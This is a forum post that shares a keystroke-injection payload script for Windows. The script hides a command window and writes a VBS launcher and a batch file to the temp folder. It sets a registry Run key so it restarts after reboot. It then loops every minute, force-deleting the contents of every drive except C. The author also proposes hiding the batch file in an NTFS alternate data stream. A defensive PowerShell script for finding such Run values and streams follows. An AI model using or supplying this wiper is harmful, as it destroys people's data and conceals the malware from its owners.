
[Payload] Batch wiper response


overwraith


I have had a similar payload written for a while, but the batch wiper link that Darren provided gave me a few new ideas. I learned how to make a registry key that would restart the batch file on reboot. Apparently this requires admin rights to run since it modifies the registry. You can test this payload on your own machine by replacing the directory- and file-removing commands with a dir command. I also found a better Visual Basic file online for invisibly running batch files.

[CODE]
REM By overwraith
REM EraseFlashDrives.txt
REM PURPOSE: to delete the contents of attached drives.
CONTROL ESCAPE
STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM THE DIRECTORY YOU WANT TO HIDE THE SCRIPT IN
STRING cd %TEMP%
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM Delete batch file if already exists
STRING erase /Q SecurityBullseye.bat
ENTER
REM Make the batch file
REM SLIGHT THROWBACK TO VIDEO GAME BIOSHOCK I/II
STRING copy con SecurityBullseye.bat
ENTER
REM REGISTRY KEY RESTARTS THE SCRIPT ON REBOOT
STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\SecurityBullseye.bat" /f
ENTER
STRING :while1
ENTER
REM C:\ IS USUALLY THE DRIVE THE OS IS INSTALLED ON, SO OMIT.
STRING for %%a in (A B D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
ENTER
STRING IF EXIST %%a:\ erase /Q /S /F "%%a:\*.*"
ENTER
STRING IF EXIST %%a:\ rmdir /Q /S "%%a:\*"
ENTER
STRING )
ENTER
STRING timeout /t 60
ENTER
STRING goto :while1
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs SecurityBullseye.bat
ENTER
STRING EXIT
ENTER[/CODE]


May throw in some alternate data stream stuff later. Can hide the batch file behind another file using a colon. The biggest problem would be extracting one file name via the command line, and changing the rest of the script accordingly. Another thing that could make it easier would be just making the file to attach the alternate data stream to, and making it appear to be something Windows generated.

File1.txt:SecurityBullseye.bat

Would need specialized software like LADS or The Sleuth Kit to find it.

Example...

[CODE]
C:\Users\UserName>echo hello > File1.txt

C:\Users\UserName>echo hello > File1.txt:SecurityBullseye.txt

C:\Users\UserName>dir *.txt /B
File1.txt

C:\Users\UserName>
[/CODE]

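A defender-side audit for the two artifacts discussed in this thread, a Run value that starts a script host from a temp directory and data attached to a file as an NTFS alternate data stream. It is an added example, not part of the original posts; the function names, match patterns and default scan root are assumptions, and `Get-Item -Stream` needs PowerShell 3.0 or later.

```powershell
# Added example (not from the thread). Read-only: it changes nothing on the host.
# Assumption: the scan root defaults to the current user's TEMP directory.
param([string]$ScanRoot = $env:TEMP)

$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
)
# Script hosts and user-writable locations that deserve a second look
# when they appear together in an autorun command line.
$hostPattern = '\b(wscript|cscript|cmd|powershell)(\.exe)?\b'
$pathPattern = '(%TEMP%|%TMP%|\\AppData\\Local\\Temp\\|\\Windows\\Temp\\)'

function Get-SuspiciousRunValue {
    foreach ($key in $runKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        $item = Get-Item -Path $key
        foreach ($name in $item.GetValueNames()) {
            # Read the stored data without expanding variables, so both the
            # literal %TEMP% form and an already-expanded path can match.
            $data = [string]$item.GetValue($name, $null,
                [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames)
            if ($data -match $hostPattern -and $data -match $pathPattern) {
                [pscustomobject]@{ Key = $key; Name = $name; Data = $data }
            }
        }
    }
}

function Get-AlternateStream {
    param([string]$Root)
    # Files only. Every file has the unnamed ':$DATA' stream; anything else
    # is an alternate stream. 'Zone.Identifier' is the routine
    # mark-of-the-web on downloaded files, so expect to see it.
    Get-ChildItem -Path $Root -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue
        } |
        Where-Object { $_.Stream -ne ':$DATA' } |
        Select-Object FileName, Stream, Length
}

Get-SuspiciousRunValue | Format-Table -AutoSize -Wrap
Get-AlternateStream -Root $ScanRoot | Format-Table -AutoSize
```

On Windows Vista and later, `dir /R` in cmd also lists alternate streams next to each file.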
